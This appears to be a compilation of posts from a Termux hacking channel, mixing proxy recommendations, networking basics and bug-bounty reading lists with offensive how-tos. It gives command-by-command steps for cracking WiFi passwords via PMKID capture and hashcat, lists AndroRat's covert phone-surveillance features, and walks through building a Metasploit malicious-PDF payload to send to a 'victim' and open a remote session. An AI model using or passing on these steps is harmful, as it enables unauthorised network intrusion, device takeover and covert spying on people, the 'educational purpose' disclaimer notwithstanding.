Termux learners¤¤

⭕️ How to Browse Anonymously on websites (Top 3 methods)
➖➖➖➖➖➖➖➖➖➖➖➖➖
Using Web Proxy Sites♨️

Using web proxies are the best and easy way to browse secretly on the internet. There are some web proxy sites like Proxify, Anonymous, or Hide My Ass. By using these sites, you can easily have secure access to the internet. These proxy sites give an alternative address of the site which you want to browse anonymously on the Internet. But there are some drawbacks to these proxies as the browsing speed can be slow.

🔹 Proxify

It is an anonymous proxy service which allows anyone to surf the Web privately and securely. Through Proxify, you can use websites, but they cannot uniquely identify or track you. Proxify hides your IP address, and our encrypted connection prevents the monitoring of your network traffic. Once using Proxify, you can surf normally and forget that it is there, protecting you.

🔹 Anonymouse

This service allows you to surf the web without revealing any personal information. It is fast, easy, and free. You just need to enter the website name and hit the “Surf Anonymously” button to start surfing.

🔹 Hide My Ass(HMA)

This is one of the famous web proxy sites that helps you to bypass online restrictions to access foreign websites. You can evade hackers and can enjoy complete security, even on public wifi connections. You can safeguard your personal information and your location (IP address) online.

⚠️ Not only this. There are alot of VPN's to browse anonymously for beginners. I referred you the one of the best vpn. I hope you will found it useful.

Now you need some brain, basic knowledge and patience for that👇👇🎭

🎩 How to Hack WiFi passwords [Using Kali Linux] 🎩

Tools need to be downloaded:-
Hcxdumptool
Hcxpcaptool
Hashcat

Steps:-
🌀1] Request PMKID from the router

Unlike older techniques where you had to wait until a user connected to the access point so that you can capture the 4-way handshake that is of EAPOL.This new method for finding out the password credentials does not require that anymore. The attack works on the RSN-IE or Robust Security Network Information Element. It only uses one frame which it requests from the wireless router.

🌀2] Install Hcxdumptool & Hcxpcaptool

This is a tool that will help you to capture the PMKID packet from the access point. After capturing the frame, it can also dump it into a file for you. Below are some features of Hcxdumptool:

Can easily capture identities and usernames from a WLAN.Can easily capture passwords, plain master keys, handshakes and PMKIDs from traffic on WLAN.

After installing this tool run the below command in the CLI.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

The command displayed above will dump the frame to a file.

🌀3] After doing the above step now you will need to extract some contents from the frame file. This will be in the pcapng format. You can easily convert this into a hash format which the popular program ‘Hashcat‘ can accept. Use the below command to extract the pcapng file.

$ ./hcxpcaptool -z test.16800 test.pcapng

🌀4] Using Hashcat to Crack the Wifi Password (WPA PSK Pre-Shared Key Recovery)

Hashcat is a tool used a lot in the security and pe*******on testing field. It is used by both hackers and researchers for finding out passwords by cracking their hash. After finding out the hash of the password you can enter the password in hashcat and it will find it out for you. It will take some time depending on how complex the password is of the wireless network. Enter the cmd below and run hashcat.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

🔰Network Protocol🔰

🌀Router: A router is a network device whose main goal is to transfer data back and forth between different networks. This device allows requests to be made to the internet and for information to be sent back to the devices on a local network.

🌀Switch: The basic function of a switch is to provide access between devices on a local network. An example is an Ethernet switch.

🌀Network Interface: This component allows you to connect to a public or private network. It provides the software required to utilize networking hardware. An example of this is the Network Interface Cards (NICs).

🌀Port: A port is a logically defined connection location. Ports provide a destination endpoint for communication and the transfer of data. The ports range from 0 to 65535.

🌀Packet: A packet is the basic unit of data transferred over a network. A packet has a header that gives information about the packet (source, destination, etc) and a body or payload containing the actual data being sent.

FROM INTERNET

1)A Bug Bounty Tester’s Guide to Detecting XSS Vulnerabilities
https://thecybersecurityman.com/2021/02/15/a-bug-bounty-testers-guide-to-detecting-xss-vulnerabilities/

2)A ffuf Primer
https://danielmiessler.com/study/ffuf/

3)Acting on Cloud Native Security Data with Splunk
https://blog.aquasec.com/aqua-security-splunk-integration?utm_campaign=General%20website&utm_medium=email&_hsmi=111380801&_hsenc=p2ANqtz-_eqg7vcCmjeqgaTUoGtVo-mVA5GhFFPGbUMd4r0coIoVEzsD-vqlzrFsCOXIcLs6jAb_6sEPzRptPM1pffVBciB8XSqA&utm_content=111380801&utm_source=hs_email

4)Clark-Wilson Security Model
https://www.drchaos.com/post/clark-wilson-security-model-1?postId=6008ae81fb9e89001718af66

5)OSV - Open Source Vulnerability DB And Triage Service
https://github.com/google/osv

6)zaphoster
https://github.com/knassar702/zaphoster

A Bug Bounty Tester’s Guide to Detecting XSS Vulnerabilities Cross Site Scripting (XSS) vulnerabilities occur when web applications include untrusted data on a web page without proper sanitization and validation of user input, such as when a web page include…

FROM INTERNET

1)RCE on build server via misconfigured pip install
https://hackerone.com/reports/946409

2)A Tale of 2nd $ # # # Bounty from Facebook
https://medium.com/bugbountywriteup/a-tale-of-2nd- # # #-bounty-ability-to-gain-persistence-on-facebook-events-as-an-unremovable-9408338ccf8f

3)Oauth Misconfig — Leads to Account Takeover
https://rakeshelamaran.medium.com/oauth-misconfig-leads-to-account-takeover-7a360e6d9cac

4)Mastering the Skills of Bug Bounty
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4

5)Hacking the Same-Origin Policy
https://medium.com/swlh/hacking-the-same-origin-policy-f9f49ad592fc

6)Crash Course Network Security
https://medium.com/swlh/crash-course-network-security-c35eb6d07279

7)Actively Exploited Windows Kernel EoP Bug Allows Takeover
https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/

8)Optimizing Performance and Behavior with WordPress and the Sucuri WAF
https://blog.sucuri.net/2021/02/optimizing-performance-and-behavior-with-wordpress-and-the-sucuri-waf.html?utm_campaign=Blog%20RSS&utm_medium=email&_hsmi=110310619&_hsenc=p2ANqtz-_GiQWRzRy5ESfLVGV2y7PkNn-NYU2yF4YyawCg3HStmi_EKuSOEwtAPJC0Owpo9XuuHaKT8b-n0L5bDgIZN4nDF2zcqg&utm_content=110310619&utm_source=hs_email

9)The great SameSite confusion
https://jub0bs.com/posts/2021-01-29-great-samesite-confusion/

10)The Acunetix REST API
https://www.acunetix.com/blog/web-security-zone/acunetix-rest-api/

11)Intel Squashes High-Severity Graphics Driver Flaws
https://threatpost.com/intel-graphics-driver-flaws/163810/

12)Apple Patches 10-Year-Old macOS SUDO Root Privilege Escalation Bug
https://thehackernews.com/2021/02/apple-patches-10-year-old-macos-sudo.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29

13)ATTPwn To Emulate Adversaries
https://github.com/Telefonica/ATTPwn

Yelp disclosed on HackerOne: RCE on build server via misconfigured... [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies](https://medium.com/.birsan/dependency-confusion-4a5d60fec610?sk=991ef9a180558d25c5c6bc5081c99089)

FROM INTERNET

1)Reflected XSS Vulnerability Existed In PayPal Currency Converter Wallet
https://latesthackingnews.com/2021/02/12/reflected-xss-vulnerability-existed-in-paypal-currency-converter-wallet/

2)The Lone Sharepoint
https://www.crummie5.club/the-lone-sharepoint/

3)Difference between DELETE, DROP and TRUNCATE in SQL
https://www.thecrazyprogrammer.com/2021/02/difference-between-delete-drop-and-truncate.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+TheCrazyProgrammer+%28The+Crazy+Programmer%29

4)Practical Mitigations For Dependency Confusion Attack
https://www.kernelcrypt.com/posts/depedency-confusion-explained/

5)BURPSUITE CHEET SHEET
https://www.sans.org/security-resources/posters/burp-suite-cheat-sheet/280/download

6)Google Search Engine to Get Dark Mode Feature Soon
https://techviral.net/google-search-engine-to-get-dark-mode-feature/?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+thetechviral+%28Tech+Viral%29

7)PatrowlHears Vulnerability Intelligence Center / Exploits
https://github.com/Patrowl/PatrowlHears

Reflected XSS Vulnerability Existed In PayPal Currency Converter Wallet Exploiting this XSS vulnerability in PayPal feature could allow injecting malicious codes. PayPal awarded $2900 bounty to the bug hunter.

The most popular application for hacking an Android phone is called "AndroRat".

Androrat (Android Remote Administration Tool): An application written in java programming language that allows you to hack or completely control your Android phone from one computer.

This app was originally designed to make it easier for parents to control their children's Android operating system. I urge you to use this app for the purpose I just mentioned.

And This software application (androrat apk Binder) has its own malware program. This computer application (androrat apk Binder .exe) works with a well-known Android application (xender, Gallery ....) and then runs its own app.

Using "Androrat" one can do 9 main things ⤵️

1⃣ View, edit, deactivate a person's contact record.

2⃣ Can make the phone vibrate.

3⃣ Using the person's phone internet ...

4⃣ Sending a message, as well as reading messages.

5⃣ Find out the exact location of the phone with Gps (most people know where the person holding the phone is because they pick up the phone wherever they go ..)

6⃣ Record and watch live video on the front and rear cameras of the phone without any signal

7⃣ Photography

8⃣ Calling the person

9⃣ Record and listen live to the microphone on the phone ...

*LOT OF PEOPLE ASKS US ON HOW TO HACK SO I DECIDED TO WRITE ANOTHER ARTICLE ON THAT ISSUE, THIS DEVICE THIS IS ANOTHER METHOD TO DO THAT*

HOW TO HACK ANY DEVICE VIA PDF

and us for such Posts!!
Things Required
▪️Termux
▪️Metasploit
▪️Good internet Connection
Note : Only for Educational Purpose 💁 Try on your own risk!

⌨️LET'S START THE HACK⌨️

▪️Open termux and follow the commands mentioned below. First, make sure you have metaploit installed in it.

$ msfconsole

$ use exploit/windows/fileformat/

adobe_pdf_embed_exe_nojs $ setlhost (your IP)

$ set lport (use any port)

$ exploit

▪️Now you have the pdf in metasploit. Move PDF payload to your storage card. Follow the commands below.

ls -la

cd .msfs

cd local

mv (filename)/(move locations)

Now you'll see PDF payload in the SDCard, just send it to the VICTIM and convince to open it. Then you need to start the session.

STARTING THE SESSION

Follow these commands:
▪️use exploit/multi/handler
set lhost (IP)
set lport (port)
exploit
▪️Now you have access of the victim's phone, you can even bypass the OTP.

This method is not 100% Accurate but it works for the most of the time!

Try on your own risk!

FROM INTERNET

1)Bypassed a fix to gain access to PII of more than 100 Officers
https://hackerone.com/reports/1074136

2)[intensedebate.com] Open Redirect
https://hackerone.com/reports/1050193

3)An Accidental XSS on uu.nl
https://santoshdbobade.blogspot.com/2021/02/an-accidental-xss-onuunl.html

4)Subdomain Takeover in Azure: making a PoC
https://godiego.tech/posts/STO/

5)Remote Code Ex*****on - Explaination, Writeups and Tools.
https://medium.com//remote-code-execution-explaination-writeups-and-tools-a8e4c3362259

6)Hacking Chess.com and Accessing 50 Million Customer Records
https://samcurry.net/hacking-chesscom/

7)Baselines and Anomaly Detection – The Future of Security Capabilities
https://www.drchaos.com/post/baselines-and-anomaly-detection-the-future-of-security-capabilities?postId=60199fced1637f0017e0e6f0

8)Why Information and Network Security are important
https://latesthackingnews.com/2021/02/11/why-information-and-network-security-are-important/

9)ShellShockHunter
https://github.com/MrCl0wnLab/ShellShockHunter

10)Cypher
https://github.com/capture0x/cypher

U.S. Dept Of Defense disclosed on HackerOne: Bypassed a fix to gain... **Summary:** Hey team I hope this report finds you well and you're having a great day in these difficult times ;) While doing my Recon I have found out that https://www.███/ is leaking PII of many Officers Severity according to me- Critical # # Step-by-step Reproduction Instructions 1. Go to ht...

FROM INTERNET
1)Probably unexploitable XSS via Header Injection
https://hackerone.com/reports/836689

2)Open Redirect at https://oauth.secure.pixiv.net
https://hackerone.com/reports/972601

3)Deep Dive: Burp Bounty Extension
https://vimeo.com/493308580/1b006ed5ed

4)Advanced Testing Of Web Application With Custom Message Signing Using Hackvertor
https://michael-yer.medium.com/advanced-testing-of-web-application-with-custom-message-signing-using-hackvertor-577fad163df1

5)Fawkes - Tool To Search For Targets Vulnerable To SQL Injection
(Performs The Search Using Google Search Engine)
https://github.com/0xdutra/fawkes

WHO COVID-19 Mobile App disclosed on HackerOne: Probably... The Who-Platform header is reflected in the output of the page if it's not one of the recognized Who-Platform values (IOS, ANDROID, WEB). While this is probably no longer exploitable (as of ~2015), it may be exploitable on less well implemented browsers (not Chrome/Firefox/Edge). In general, though,...